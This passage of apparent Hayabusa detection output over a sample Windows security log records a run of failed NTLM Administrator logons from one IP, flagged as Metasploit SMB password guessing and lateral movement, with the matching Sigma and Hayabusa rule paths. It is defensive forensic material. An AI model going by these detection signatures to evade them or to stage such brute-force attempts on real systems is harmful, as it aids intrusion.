NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:36.961 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PV8628a8GNKoFyzM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.006 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mksBFEFzkC08dB4o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U6QlHT6Bp63JDehd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tRj4fxcRY0Esegl6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dj6zQjZwGEBo0zNt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.157 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: imfY1T2VMoaqDSUd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.202 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: qvPP8UYn9fLpRYl4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.243 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rFTGQ5tzNI5k58cK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.289 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F8Zj3g1WiTLx8OlJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.329 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x2Lr6j8Qt4xEmZZF : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BeDRsguCovO47lKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KqrDyaFTewMPSzD9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.445 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nBVMAki1Ghpknf6p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.489 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXKhNUmBUQBTyeNM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.535 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d1g9TVwsweaBfZgE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kWymb6ucohaBB60b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.747 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: LjL0zwlZofVuWhGC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.747 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nxsdzkJdnaZs5eKL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PR6EpKvbqMeoQlKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OZ3LMTtsVNI1gRO2 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.889 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75bNeXwYSZPhJdJ7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.929 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lH6TVXSqJb1qLd3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:37.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: edDWye6c2UhKznR6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AxKUl1lynGY1ectn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.057 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.094 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vI5yUgukPBVRorJI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.094 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmR29QcBKMGVQ8rB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.142 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.177 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: b7luV5GfiT0v0h7D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.177 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yA7pIDFgQbLIInqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.257 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 84g2gO0253Ut4O1O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.257 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DRkFX9WTAhBZ8jc8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WuoQAi4k3XZPaf4O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KjKMhCnbR0uFT0av : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.393 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1lfwqPB0AgTfIOt4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mJuG26pQzdjUQael : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GXwEziYTA3DkkFVq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CHr6dirvkT8B9ZVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: B5eSMLiF4BsfY3xN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.623 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 64ISDuFRhR6cFYVQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hcprXytyuBw380XY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxfQWiSIhZYxwNjh : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FcL982boDelzeyzK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBAAjRdaR8U0tqt7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EmqUjcltAW6StHQJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.857 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 129Rp3HCmRVRXw3C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jpIIQP2oWEF51EBI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.975 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HREGh5ppEkLAuEob : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:38.975 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:39.022 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
